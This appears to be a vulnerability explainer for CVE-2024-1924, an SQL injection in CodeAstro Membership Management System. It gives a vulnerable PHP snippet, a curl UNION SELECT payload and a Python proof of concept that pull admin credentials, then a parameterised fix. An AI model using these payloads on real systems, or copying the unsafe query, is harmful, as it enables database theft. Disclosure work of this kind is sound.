CVE ID: CVE-2024-1924
Vulnerable Software: CodeAstro Membership Management System 1.
Vulnerability Type: SQL Injection
Attack Vector: Remote
Public Exploit Available: YES
Reference: VDB-254859

What is CVE-2024-1924?

A critical SQL injection vulnerability has been found in the CodeAstro Membership Management System version 1.. The issue lies in how the /get_membership_amount.php file handles the membershipTypeId argument. If abused, it allows remote attackers to manipulate the system's database: view, edit or delete data, and potentially gain administrative access or mount further attacks.

How Does the Vulnerability Work?

The vulnerable PHP script does not validate or sanitize the value passed in the membershipTypeId HTTP parameter. A malicious user can supply specially crafted input that changes the structure of the SQL query the script executes, which opens the door to arbitrary database manipulation.

Suppose this is a snippet from the vulnerable file:

// get_membership_amount.php (vulnerable as described above)

<?php
include "db.php"; // connects to your database and provides $conn

// Untrusted input taken straight from the query string, no validation.
$membershipTypeId = $_GET['membershipTypeId'];

// The input is concatenated into the SQL text: this is the injection sink.
$query = "SELECT amount FROM membership_types WHERE id = $membershipTypeId";
$result = mysqli_query($conn, $query);

$row = mysqli_fetch_assoc($result);
echo $row['amount'];
?>

Here, the user input from $_GET['membershipTypeId'] goes *directly* into the SQL query text, so anything the attacker appends is parsed as SQL rather than treated as a value.

Below is a sample exploit using curl to extract data through a basic SQL injection:

curl "http://targetsite.com/get_membership_amount.php?membershipTypeId=1%20UNION%20SELECT%20username%20FROM%20admin_users--"

- The first part of the query requests the normal amount for membership type 1.
- The UNION SELECT clause tells the database to append results from the admin_users table, possibly revealing sensitive user info.

Here's a more advanced proof-of-concept in Python to dump database information:

import requests

url = "http://targetsite.com/get_membership_amount.php"
payload = "1 UNION SELECT password FROM admin_users -- "

res = requests.get(url, params={'membershipTypeId': payload})
print("Response:", res.text)

Warning: Never run this against systems you do not own or do not have written permission to test.

Patch and Update

Check the official CodeAstro repository or vendor advisories for updates and patches.
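As an added illustration (not CodeAstro's code and not the vendor's patch), the snippet above can be rewritten so that membershipTypeId is validated as an integer and bound as a query parameter; the payloads shown earlier are then rejected outright or treated as a literal value, never as SQL. It assumes, as the original snippet does, that db.php provides a mysqli connection in $conn.

```php
<?php
// get_membership_amount.php, hardened version (added example, not the vendor's patch).
// Assumes db.php provides a mysqli connection in $conn, as in the snippet above.
include "db.php";

// 1. Validate: the id must be a positive integer. Anything else, including
//    "1 UNION SELECT ...", is rejected before the database is touched.
$membershipTypeId = filter_input(
    INPUT_GET,
    'membershipTypeId',
    FILTER_VALIDATE_INT,
    ['options' => ['min_range' => 1]]
);
if ($membershipTypeId === null || $membershipTypeId === false) {
    http_response_code(400);
    exit('invalid membershipTypeId');
}

// 2. Parameterize: the query text is fixed and the value travels separately,
//    so it can never alter the statement's structure even if validation were
//    bypassed elsewhere. This is the structural fix; step 1 is defence in depth.
$stmt = $conn->prepare("SELECT amount FROM membership_types WHERE id = ?");
if ($stmt === false) {
    http_response_code(500);
    exit('database error');
}
$stmt->bind_param('i', $membershipTypeId);
$stmt->execute();
$stmt->bind_result($amount);

if ($stmt->fetch()) {
    // 3. Encode on output so the value is also safe in an HTML context.
    echo htmlspecialchars((string) $amount, ENT_QUOTES, 'UTF-8');
} else {
    http_response_code(404);
    echo 'unknown membership type';
}
$stmt->close();
```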

References

- Vulnerability Disclosure: VulDB VDB-254859
- OWASP: SQL Injection
- GitHub: Source Code

Summary

CVE-2024-1924 is a dangerous, publicly known vulnerability in CodeAstro's Membership Management System 1., affecting common installations and putting sensitive user data at risk. Site owners should patch immediately, check all user inputs for SQL injection, and follow security best practices to avoid further compromise.

If your system is at risk, take action: update, patch, and review your code today.

Stay safe! If you use CodeAstro Membership Management System, audit your installation now. For help, see the resources above.

Timeline

Published on: 02/27/2024 17:15:11 UTC
Last modified on: 03/21/2024 02:51:49 UTC